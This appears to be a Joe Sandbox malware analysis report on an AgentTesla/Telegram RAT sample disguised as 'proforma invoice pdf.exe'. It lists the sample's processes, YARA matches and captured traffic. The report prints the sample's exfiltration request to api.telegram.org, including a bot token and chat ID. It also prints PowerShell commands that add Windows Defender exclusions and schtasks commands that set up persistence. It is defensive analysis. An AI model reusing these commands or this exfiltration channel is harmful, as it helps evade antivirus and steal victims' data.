2025-01-08 11:34:45 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:34:45 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138016,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336085,"document":{"file_name":"user-116938 2025-01-08 06-34-43.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbIGd-YtVmIF64v8mlDCdn-XwZfBpUAAJhFgACPzjxU7zcwNTKxg1gAQAHbQADNgQ","file_unique_id":"AQADYRYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbIGd-YtVmIF64v8mlDCdn-XwZfBpUAAJhFgACPzjxU7zcwNTKxg1gAQAHbQADNgQ","file_unique_id":"AQADYRYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGyBnfmLVZiBeuL_JpQwnZ_l8GXwaVAACYRYAAj848VO83MDUysYNYDYE","file_unique_id":"AgADYRYAAj848VM","file_size":76828},"caption":"New SC Recovered!\n\nTime: 01/08/2025 06:34:43\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.7	49745	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:34:45 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fae89c26833 Host: api.telegram.org Content-Length: 77457 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:34:45 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:34:45 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 61 65 38 39 63 32 36 38 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 61 65 38 39 63 32 36 38 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 30 36 3a 33 34 3a 34 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fae89c26833Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fae89c26833Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/08/2025 06:34:43User
2025-01-08 11:34:45 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:34:45 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:34:45 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:34:45 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:34:45 UTC	11871	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:34:45 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 61 65 38 39 63 32 36 38 33 33 2d 2d 0d 0a Data Ascii: -----------------------------8dd2fae89c26833--
2025-01-08 11:34:46 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:34:46 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138018,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336086,"document":{"file_name":"user-116938 2025-01-08 06-34-43.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbImd-YtUjb0h9btuh0HdV75v2Rt7yAAJjFgACPzjxUy1o3sZMGiL6AQAHbQADNgQ","file_unique_id":"AQADYxYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbImd-YtUjb0h9btuh0HdV75v2Rt7yAAJjFgACPzjxUy1o3sZMGiL6AQAHbQADNgQ","file_unique_id":"AQADYxYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGyJnfmLVI29IfW7bodB3Ve-b9kbe8gACYxYAAj848VMtaN7GTBoi-jYE","file_unique_id":"AgADYxYAAj848VM","file_size":76828},"caption":"New SC Recovered!\n\nTime: 01/08/2025 06:34:43\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Target ID:	0
Start time:	06:30:30
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\proforma invoice pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\proforma invoice pdf.exe"
Imagebase:	0xa00000
File size:	879'112 bytes
MD5 hash:	B67477603738159B912B0AA9C197897F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1485785699.00000000072A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1482009308.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:30:31
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe"
Imagebase:	0xef0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:30:31
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:30:31
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wTyVrj.exe"
Imagebase:	0xef0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:30:31
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:30:31
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp"
Imagebase:	0x4a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:30:31
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:30:32
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\proforma invoice pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\proforma invoice pdf.exe"
Imagebase:	0x1a0000
File size:	879'112 bytes
MD5 hash:	B67477603738159B912B0AA9C197897F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:30:32
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\proforma invoice pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\proforma invoice pdf.exe"
Imagebase:	0x990000
File size:	879'112 bytes
MD5 hash:	B67477603738159B912B0AA9C197897F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	06:30:33
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\wTyVrj.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wTyVrj.exe
Imagebase:	0x10000
File size:	879'112 bytes
MD5 hash:	B67477603738159B912B0AA9C197897F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 33%, Virustotal, Browse Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:30:34
Start date:	08/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:30:36
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp471D.tmp"
Imagebase:	0x4a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:30:36
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:30:36
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\wTyVrj.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\wTyVrj.exe"
Imagebase:	0x120000
File size:	879'112 bytes
MD5 hash:	B67477603738159B912B0AA9C197897F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:30:36
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Roaming\wTyVrj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\wTyVrj.exe"
Imagebase:	0x710000
File size:	879'112 bytes
MD5 hash:	B67477603738159B912B0AA9C197897F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	06:30:44
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"
Imagebase:	0x9f0000
File size:	879'112 bytes
MD5 hash:	B67477603738159B912B0AA9C197897F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 33%, Virustotal, Browse Detection: 63%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:30:46
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp6D52.tmp"
Imagebase:	0x4a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:30:46
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	06:30:46
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"
Imagebase:	0xd50000
File size:	879'112 bytes
MD5 hash:	B67477603738159B912B0AA9C197897F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3913664418.0000000003295000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000014.00000002.3913664418.0000000003295000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3913664418.0000000003275000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	06:30:52
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"
Imagebase:	0x970000
File size:	879'112 bytes
MD5 hash:	B67477603738159B912B0AA9C197897F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	06:30:53
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp889B.tmp"
Imagebase:	0x4a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	06:30:53
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	06:30:53
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"
Imagebase:	0x650000
File size:	879'112 bytes
MD5 hash:	B67477603738159B912B0AA9C197897F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.3911170216.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000019.00000002.3911170216.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.3911170216.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7.5%
Total number of Nodes:	240
Total number of Limit Nodes:	12

Executed Functions

Function 073024E8 Relevance: 6.0, Strings: 4, Instructions: 1029
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\ lw, xrefs: 073028F1
Teq, xrefs: 07302D3F
xbq, xrefs: 07302618
4'q, xrefs: 073030DF

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: 4'q$Teq$\ lw$xbq
API String ID: 0-807568411
Opcode ID: fdadd2bea03e7c55268563495f2f36798df9ec932a5139edacbbf5d86ebd08c0
Instruction ID: 709157a1047e6535d738c142d6c5999689e9ad702498c2a959479d2f0af561c5
Opcode Fuzzy Hash: fdadd2bea03e7c55268563495f2f36798df9ec932a5139edacbbf5d86ebd08c0
Instruction Fuzzy Hash: 38B2B175E00628CFDB64CF69C984AD9BBB2BF89304F1581E9D50DAB265DB319E81CF40

Function 05357DF8 Relevance: 4.3, Strings: 2, Instructions: 1815
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$Iq, xrefs: 05357E7F
'Iq, xrefs: 05357E33

Memory Dump Source

Source File: 00000000.00000002.1483746210.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5350000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: 'Iq$$Iq
API String ID: 0-3401835584
Opcode ID: 3c888be0bba9a9f023c5452eb92f77a1a7f41e8aa7c2611ba45de849ebca762e
Instruction ID: ad4c894d7c6b1ec2b452d3ac7536137f4d33f63a577e74bd157e4f6ba9517b60
Opcode Fuzzy Hash: 3c888be0bba9a9f023c5452eb92f77a1a7f41e8aa7c2611ba45de849ebca762e
Instruction Fuzzy Hash: 7B13A434A11219CFDB25EF24C898AD9B7B2FF89300F5152E9D9096B361DB71AE85CF40

Function 05357DEA Relevance: 4.3, Strings: 2, Instructions: 1806
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$Iq, xrefs: 05357E7F
'Iq, xrefs: 05357E33

Memory Dump Source

Source File: 00000000.00000002.1483746210.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5350000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: 'Iq$$Iq
API String ID: 0-3401835584
Opcode ID: 2b7f064845687192b10df6436ef6c5007dd6a846273e6efbb788a7803806aad0
